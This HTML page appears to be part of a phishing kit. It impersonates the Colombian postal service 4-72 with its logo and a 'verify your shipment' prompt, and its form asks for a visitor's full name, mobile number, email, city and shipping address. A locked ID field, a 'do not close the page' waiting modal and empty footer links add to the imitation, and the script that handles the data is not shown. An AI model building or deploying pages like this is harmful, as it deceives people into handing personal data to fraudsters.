<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Información General</title>
    <link rel="shortcut icon" href="./assets/logos/favicon.png">
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <link href="https://fonts.googleapis.com/css2?family=Nunito:ital,wght@0,200;0,300;0,400;0,500;0,600;0,700;0,800;0,900;0,1000;1,200;1,300;1,400;1,500;1,600;1,700;1,800;1,900;1,1000&amp;display=swap" rel="stylesheet">
    
    <!-- <meta http-equiv="Content-Security-Policy" content="default-src 'self'; font-src 'self' https://fonts.googleapis.com https://fonts.gstatic.com;"> -->

    <!-- CSS -->
    <link rel="stylesheet" href="./css/normalize.css">
    <link rel="stylesheet" href="./css/main.css">
    
    <!-- VALIDATIONS -->
    <script src="./js/functions.js"></script>
</head>
<body>

    <!-- MODAL ESPERA -->
    <div class="modal" id="modal-esperar">
        <div class="modal-body">
            <h3 class="modal-title">Espera un momento...</h3>
            <div class="d-center">
                <div class="lds-ellipsis"><div></div><div></div><div></div><div></div></div>
            </div>
            <p style="text-align: center;">
                No actualices ni cierres la página.
            </p>
            <span style="text-align: center;" class="thin">Trabajamos día y noche para conectar al país.</span>
        </div>
    </div>





    <header>
        <div class="navbar-container">
            <img src="./assets/logos/logo_472.png" alt="" class="navbar-logo">
            <img src="./assets/svg/hamburguer-menu.png" alt="" class="navbar-menu">
        </div>
    </header>

    <main>
        <h3 class="section-title">Verifiquemos la información de tu envío.</h3>
        <form class="form" action="" id="form">

            <input id="cc" type="text" class="disabled" disabled placeholder="">
            <input id="names" type="text" required placeholder="Nombre(s) y Apellido(s)">
            <input id="cel" type="number" min="1000000000" oninput="limitarDigitos(this, 10)" required placeholder="Celular">
            <input id="email" type="email" required placeholder="Correo Electrónico">
            <input id="cenv" type="text" required placeholder="Ciudad de Envío">
            <input id="dir" type="text" required placeholder="Dirección de Envío">

            <button type="submit" class="btn-success btn-100">
                Verificar
            </button>
        </form>

    </main>

    <footer>
        <hr>
        <p>Sobre nosotros</p>
        <hr>
        <p>Links de interés</p>
        <hr>
        <p>Centro de ayuda</p>
        <hr>
        <p>Accesos corporativos</p>
        <hr>
        <div class="footer-links">
            <img src="./assets/svg/ico-fb.svg" alt="">
            <img src="./assets/svg/ico-ins.svg" alt="">
            <img src="./assets/svg/ico-tw.svg" alt="">
            <img src="./assets/svg/ico-yt.svg" alt="">
            <img src="./assets/svg/ico-lk.svg" alt="">
            <img src="./assets/svg/ico-vigilado.png" alt="">
        </div>
        <hr>
        <div class="footer-links">
            <p class="thinier">Política de privacidad | Términos y Condiciones | Mapa del sitio</p>
        </div>
    </footer>


    <!-- SCRIPTS -->
    <script src="./js/infoGeneral.js"></script>   
</body>
</html>